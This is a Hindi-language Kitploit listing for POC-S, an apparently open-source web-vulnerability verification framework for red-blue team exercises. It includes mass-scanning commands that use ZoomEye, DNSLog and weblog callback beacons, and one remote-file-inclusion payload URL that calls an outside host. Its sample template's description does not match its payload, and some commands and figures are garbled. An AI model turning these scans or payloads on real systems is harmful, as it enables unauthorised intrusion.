Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-S — POC-T का सशक्त संस्करण POC-S, जो रेड-ब्लू टीम अभ्यास में वेब एप्लिकेशन कमजोरियों के त्वरित सत्यापन के लिए उपयोग किया जाता है। इसमें कार्यक्षमता को बढ़ाया गया है तथा स्क्रिप्ट को वर्गीकृत करके जोड़ा गया है, साथ ही इसमें अंतर्निहित dnslog आदि सुविधाएँ शामिल हैं। यह प्लेटफ़ॉर्म vulhub टारगेट मशीनों और अन्य ओपन-सोर्स परियोजनाओं से उच्च-उपलब्धता वाले POC भी प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/jiangsir404/poc-s
टोहीभेद्यता स्कैनरशोषण फ्रेमवर्कजानकारी एकत्र करनावेब सुरक्षाफज़िंगपेनिट्रेशन टेस्टिंगDNS विश्लेषण
GitHubjiangsir404/poc-s

POC-S

रिपॉजिटरी देखें
356646 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

POC-T का सशक्त संस्करण POC-S, जो रेड-ब्लू टीम अभ्यास में वेब एप्लिकेशन कमजोरियों के त्वरित सत्यापन के लिए उपयोग किया जाता है। इसमें कार्यक्षमता को बढ़ाया गया है तथा स्क्रिप्ट को वर्गीकृत करके जोड़ा गया है, साथ ही इसमें अंतर्निहित dnslog आदि सुविधाएँ शामिल हैं। यह प्लेटफ़ॉर्म vulhub टारगेट मशीनों और अन्य ओपन-सोर्स परियोजनाओं से उच्च-उपलब्धता वाले POC भी प्रदान करता है।

साझा करें

POC-S: POC-T Strengthen Version POC-T加强版

POC-T का wiki दस्तावेज़ doc निर्देशिका में देखें

प्रस्तावना: वर्तमान में

कानूनी अस्वीकरण

पूर्व द्विपक्षीय सहमति के बिना, POC-S का उपयोग करके लक्ष्य पर हमला करना अवैध है। POC-S केवल सुरक्षा परीक्षण उद्देश्यों के लिए है

विशेषताएँ

  • POC-T के सिंटैक्स के साथ संगत
  • अच्छा POC वर्गीकरण, लचीला POC लोडिंग तरीका, एकल फ़ाइल, बैच, किसी भी निर्देशिका से लोड करने का समर्थन
  • pocs/poc-s टर्मिनल कमांड प्रदान करता है, फ्रेमवर्क और POC को अलग करता है, कस्टम POC को किसी भी निर्देशिका में रखा जा सकता है
  • सरल DNS प्लेटफ़ॉर्म प्रदान करता है, केवल एक डोमेन और एक सार्वजनिक IP की आवश्यकता है, कमांड ब्लाइंड इंजेक्शन और SQL ब्लाइंड इंजेक्शन को तेज़ी से सत्यापित करने के लिए उपयोग किया जा सकता है, सरल और कुशल
  • अच्छी यूनिट टेस्ट स्क्रिप्ट प्रदान करता है

TODO

  • vulhub लक्ष्य मशीनों और ओपन-सोर्स प्रोजेक्ट्स के अनुसार POC एकत्रित और पूर्ण करें, विशेष रूप से मेरा POC वर्गीकरण देखें
  • tookit.conf कॉन्फ़िगरेशन फ़ाइल को गतिशील रूप से अपडेट करने के लिए --init पैरामीटर प्रदान करें, उदा: --init zoomeye, zoomeye की कॉन्फ़िगरेशन जानकारी आरंभ करें
  • भेद्यता को तेज़ी से सत्यापित करने के लिए dnslog, weblog प्लेटफ़ॉर्म जोड़ें
  • दो सत्यापन प्लगइन जोड़ें: ceye.py और dnslog.py
  • pocsapi.py जोड़ें, sqlmapapi जैसी कार्यक्षमता
  • POC-S का py3 संस्करण जोड़ें

उपयोग

चूंकि तृतीय-पक्ष इंटरफ़ेस को प्रमाणीकरण की आवश्यकता है, आप --init पैरामीटर के माध्यम से अपने संबंधित इंटरफ़ेस कॉन्फ़िगरेशन को आरंभ कर सकते हैं, उदा: --init zoomeye

root@kitploit:~
pip install pocs

स्रोत कोड से स्थापित करें:

root@kitploit:~
git clone https://github.com/jiangsir404/POC-S.git
mv pocs/toolkit.conf.bak mv pocs/toolkit.conf
python setup.py install

यदि pip install pocs में Some files missing त्रुटि आती है, तो pocs की स्थापना निर्देशिका (python2.7\Lib\site-packages\pocs) पर जाएँ और tookit.conf का नाम बदलें। यदि WARNING: Generating metadata for package cachetools produced metadata for project name unknown. Fix your #egg=cachetools fragments. त्रुटि आती है, तो यह पैकेज निर्भरता की समस्या है। कृपया निम्नलिखित पैकेज संस्करणों की जाँच करें और अद्यतन करें: setuptools==39.0.1 cachetools==3.1.1 google-api-python-client==1.7.11

  1. अधिक लचीला प्लगइन लोडिंग तरीका
root@kitploit:~
pocs -s test/test2.py -iS 127.0.0.1 # script/test/test2.py स्क्रिप्ट लोड करें
pocs -s test2 -iS 127.0.0.1 # script/test2.py स्क्रिप्ट लोड करें

pocs -b test -iS 127.0.0.1 # /script/test निर्देशिका की सभी स्क्रिप्ट को बैच में लोड करें
pocs -b test -s test2.py -iS 127.0.0.1 # script/test/test2.py स्क्रिप्ट लोड करें

pocs -s myself_script.py -iS 127.0.0.1 # कस्टम स्क्रिप्ट और स्क्रिप्ट निर्देशिका लोड करें
pocs -b mydir -iS 127.0.0.1
  1. खोज इंजन का उपयोग
root@kitploit:~
pocs --init zoomeye // zoomeye की कॉन्फ़िगरेशन जानकारी आरंभ करें
pocs -b redis -t 50 -aZ "port:6379" --limit 50 -o res.txt
pocs -s test2.py -aZ "ThinkPHP"

ZoomEye का उपयोग करके बैच में CNVD-2020-10487 tomcat ajp lfi भेद्यता खोजें

root@kitploit:~
pip install pocs
pocs -b apache -aZ "app:tomcat" --limit 50 -t 30 -o ajp.txt

  1. DNSLog प्लेटफ़ॉर्म का उपयोग

यदि आप अभी भी ceye की अस्थिरता से परेशान हैं, और DNSLog प्लेटफ़ॉर्म बनाने के लिए समय और ऊर्जा नहीं है (दो डोमेन, एक सार्वजनिक IP की आवश्यकता है, और डोमेन के DNS सर्वर को संशोधित करने में सक्षम होना चाहिए) तो क्यों न POC-S द्वारा प्रदान किए गए सरल DNSLog प्लेटफ़ॉर्म को आज़माएँ, केवल एक डोमेन और एक सार्वजनिक IP की आवश्यकता है, सत्यापन के लिए API इंटरफ़ेस प्रदान करता है (कोई इंटरफ़ेस नहीं)

मान लीजिए dnslog.xxx.cn आपका सार्वजनिक डोमेन है, x.x.x.x सार्वजनिक IP है, सुनिश्चित करें कि dnslog.xxx.cn सामान्य रूप से x.x.x.x पर हल हो सके, अन्यथा API तक सामान्य रूप से पहुँचा नहीं जा सकता सार्वजनिक IP (x.x.x.x) पर कमांड चलाएँ:

root@kitploit:~
pip install pocs
pocs_dnslog -h 0.0.0.0 -p 88 (यदि pip से स्थापित नहीं किया गया है, तो सीधे pocs.dnslog.py स्क्रिप्ट चलाएँ)
>>> dns domain: dnslog.xxx.cn
>>> api key: rivir
>>>dns ip: x.x.x.x

dns log कमांड, केवल nslookup कमांड का समर्थन करता है: nslookup 1234.dnslog.xxx.cn x.x.x.x

यदि आप ping 1234.dnslog.xxx.cn कमांड का उपयोग करना चाहते हैं, तो आप xxx.cn डोमेन के लिए कस्टम DNS सर्वर भी कॉन्फ़िगर कर सकते हैं (DNSLog कॉन्फ़िगरेशन देखें)

web log कमांड: curl http://dnslog.xxx.cn:88/weblog/poc123

API इंटरफ़ेस पता: http://x.x.x.x:88/api/?token={token}&type={dns}&filter=1234.dnslog.xxx.cn पैरामीटर: - token अनिवार्य, DNSLog स्थापित करते समय दर्ज किया गया api_key - type अनिवार्य, वैकल्पिक मान: dns/web - filter वैकल्पिक, रिकॉर्ड फ़िल्टर करें, पूर्ण मिलान

POC

pocs अधिक लचीला प्लगइन वर्गीकरण विधि प्रदान करता है, वर्तमान में चार प्रकार के POC एकत्र किए गए हैं: Fuzz POC, OWASP POC, Vuln POC, Tool POC. POC अनुभाग में, हम github पर पहले से मौजूद कुछ POC एकत्र करने का प्रयास करेंगे, लेकिन बहुत अधिक नहीं, फिर भी व्यक्तिगत रूप से एकत्र और व्यवस्थित करने की आवश्यकता है।

POC लेखन जितना संभव हो उतना मानकीकृत होगा, POC-T की लेखन शैली का पालन करेगा। उदाहरण निम्नलिखित है

root@kitploit:~
#!/usr/bin/env python		
#coding:utf-8

"""
ThinkPHP5 <=5.0.22/<=5.1.29 रिमोट कोड एक्ज़ीक्यूशन भेद्यता

विवरण
    2018 दिसंबर 10 दोपहर, thinkphp आधिकारिक सार्वजनिक खाते ने एक अद्यतन सूचना प्रकाशित की, जिसमें 5.x श्रृंखला के सभी संस्करणों में एक उच्च जोखिम वाली भेद्यता शामिल है जो getshell की अनुमति देती है।
    फ्रेमवर्क द्वारा कंट्रोलर नाम का पर्याप्त निरीक्षण न करने के कारण, अनिवार्य रूटिंग को सक्षम किए बिना संभावित getshell भेद्यता हो सकती है,
    प्रभावित संस्करणों में 5.0.23 और 5.1.31 से पहले के सभी संस्करण शामिल हैं, नवीनतम संस्करण में जितनी जल्दी हो सके अद्यतन करने की अनुशंसा की जाती है।
संस्करण
	ThinkPHP5.0 संस्करण <= 5.0.22 ThinkPHP5.1 संस्करण <= 5.1.29
उपयोग:
	1. python POC-S.py -s 
	2. POC: /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://lj.s7star.cn/info.txt
संदर्भ
	https://www.seebug.org/vuldb/ssvid-9771
"""

import requests

def poc(url):
    pass

Vuln POC

मुख्य रूप से vulhub प्लगइन लेखन और POC-T के साथ आने वाले प्लगइन poc से आता है, केवल कुछ उच्च-उपलब्धता वाले POC जोड़ता है नीचे सूचीबद्ध प्रत्येक POC मूल रूप से स्वयं पर्यावरण स्थापित करके एक-एक करके सत्यापित किया गया है और उपयोग योग्य है, यदि कोई त्रुटिपूर्ण POC है, तो कृपया issues के माध्यम से मुझसे संपर्क करें।

  • struts2
    • s2-005.py
    • s2-015.py
    • s2-016.py
    • s2-032.py
    • s2-045.py
    • s2-052.py
    • s2-053.py
    • s2-057.py
    • struts2-devmode.py
  • weblogic
    • weblogic-ssrf-netmap.py cve-2014-4210
    • weblogc-cve-2017-10271.py (CVE-2017-10271)
    • weblogic-cve-2018-2628.py
    • weblogic-cve-2019-2725.py
    • weblogic-cve-2019-2729.py

Fuzz POC

स्रोत: boy-hack/POC-T

  • bakfile: बैकअप फ़ाइल का पता लगाना
  • crossdomain: crossdomain
  • dzxss
  • gitleak
  • issparse
  • ms15-034
  • phpinfo
  • phpmyadmin
  • svnleak
  • swf
  • tomcat_xmlleak
  • wordspace

OWASP POC

स्रोत: hunter का पता लगाने वाली स्क्रिप्ट

  • cmd_exec
  • sql_injection
  • xss
  • xxe
  • csrf
  • jsonp_xss
  • jsonp_hijacking
  • file_read
  • ssti
  • ssrf

Tool Poc

कुछ सामान्य टूल श्रेणी के POC, खोज इंजन, सूचना क्वेरी आदि कार्य प्रदान करते हैं

  • bing-dork बिंग खोज
  • bingc बिंग खोज इंजन पर आधारित IP रिवर्स डोमेन क्वेरी, C-सेगमेंट डोमेन
  • google-dork गूगल खोज
  • cdn-detect CDN का पता लगाना
  • waf WAF का पता लगाना और बिना WAF वाले URL लौटाना
  • craw लिंक से संबंधित पतों को क्रॉल करना
  • vulscan SQL इंजेक्शन भेद्यता का पता लगाना
  • portscan पोर्ट स्कैन, कमज़ोर पासवर्ड सेवाओं का पता लगाना
  • domain2ip डोमेन से IP क्वेरी
  • whois whois जानकारी क्वेरी
  • icp icp क्वेरी

अन्य ओपन-सोर्स POC जैसे https://github.com/boy-hack/airbug प्रोजेक्ट ने कुछ POC एकत्र किए हैं जिनका सीधे उपयोग किया जा सकता है, लेकिन एक HackReqeust लाइब्रेरी है जो py3 के लिए है, इसे Python2 में बदलने की आवश्यकता है, मेरे द्वारा संशोधित py2 लाइब्रेरी को सीधे स्थापित किया जा सकता है: https://github.com/jiangsir404/hack-requests

टूल डाउनलोड करें
  • weblogic-cve-2020-2551.py
  • weblogic-upload-getshell.py (CVE-2018-2894)
  • thinkphp
    • 5-rce
    • 5.0.23-rce
  • Jenkins
    • jenkins-cve-2015-8103.py
    • jenkins-cve-2017-1000353.py
    • jenkins-cve-2018-1000861.py
  • weakpass
    • mysql
    • redis
    • mongo
    • sqlserver
    • ftp
    • telent
    • वेब कमज़ोर पासवर्ड (सामान्य बिना कैप्चा के बैकएंड)
    • http-basic-auth
    • coremail
    • jboss
    • jenkins
    • weblogic
  • unauth
    • redis-unauth.py
    • mongodb-unauth.py
    • memcached-unauth.py
    • elasticsearch-unauth.py
    • kubernetes-unauth.py
    • jenkins-unauth.py
    • docker-unauth-rce.py
    • hadoop-unauth.py
  • apache
    • CNVD-2020-10487 tomcat-ajp-lfi.py
    • tomcat-upload.py
    • tomcat-weak-pass.py
  • Citrix
    • cve-2019-19781
  • supervisor
    • supervisord-RCE-CVE-2017-11610.py
  • Jboss
    • jboss-rce.py
    • CVE-2017-12149
    • CVE-2013-4810
  • spring
    • spring-oauth2-rce.py
    • cve-2018-1273
  • phpmyadmin
    • phpmyadmin-auth-rce.py
    • phpmyadmin4.8.1-RFI.py
  • kibana
    • cve-2019-7609
    • cve-2018-17246
  • php
    • fpm-rce.py
    • CVE-2019-11043
    • CVE-2018-19518
  • discuz
    • x3.4-arbitrary-file-deletion
  • zabbix
    • zabbix-jsrpc-mysql-exp.py
    • zabbix-jsrpc-sqli.py
    • zabbix-weakpass.py
    • zabbix_latest_sqli.py
  • dns-zone-transfer
  • confluence
    • confulence-traversal.py
    • confluence पथ ट्रैवर्सल और कमांड एक्ज़ीक्यूशन भेद्यता